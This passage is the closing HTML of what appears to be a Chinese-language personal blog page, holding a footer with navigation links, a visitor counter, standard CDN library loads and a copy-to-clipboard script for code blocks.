  </div>
</div>

        
        <footer id="footer">
  <div class="footer-left">
    Copyright &copy;
    
    
    2024-2026
    Xsheep
  </div>
  <div class="footer-right">
    <nav>
      <ul>
        <!--
      --><li><a href="/">首页</a></li><!--
    --><!--
      --><li><a href="/archives/">归档</a></li><!--
    --><!--
      --><li><a href="/about/">关于</a></li><!--
    --><!--
      --><li><a href="/link/">link</a></li><!--
    -->
      </ul>
      <ul>
        
          <!-- 不蒜子统计 -->
          <span id="busuanzi_container_site_pv">
              本站总访问量<span id="busuanzi_value_site_pv"></span>次
          </span>
          <span class="post-meta-divider">|</span>
          <span id="busuanzi_container_site_uv" style='display:none'>
                  本站访客数<span id="busuanzi_value_site_uv"></span>人
          </span>
        <script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
        
      </ul>
    </nav>
  </div>
  
</footer>



    </div>
    <!-- styles -->



  <link rel="preload" as="style" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css" crossorigin="anonymous" onload="this.onload=null;this.rel='stylesheet'"/>


    <!-- jquery -->

  <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js" crossorigin="anonymous"></script>




<!-- clipboard -->

  
    <script src="https://cdnjs.cloudflare.com/ajax/libs/clipboard.js/2.0.7/clipboard.min.js" crossorigin="anonymous"></script>
  
  <script type="text/javascript">
  $(function() {
    // copy-btn HTML
    var btn = "<span class=\"btn-copy tooltipped tooltipped-sw\" aria-label=\"复制到粘贴板！\">";
    btn += '<i class="fa-regular fa-clone"></i>';
    btn += '</span>';
    // mount it!
    $(".highlight table").before(btn);
    var clip = new ClipboardJS('.btn-copy', {
      text: function(trigger) {
        return Array.from(trigger.nextElementSibling.querySelectorAll('.code')).reduce((str,it)=>str+it.innerText+'\n','')
      }
    });
    clip.on('success', function(e) {
      e.trigger.setAttribute('aria-label', "复制成功！");
      e.clearSelection();
    })
  })
  </script>


<script src="/js/main.js"></script>

<!-- search -->

<!-- Baidu Analytics -->

<!-- Cloudflare Analytics -->

<!-- Disqus Comments -->

<!-- utterances Comments -->

</body>
</html>
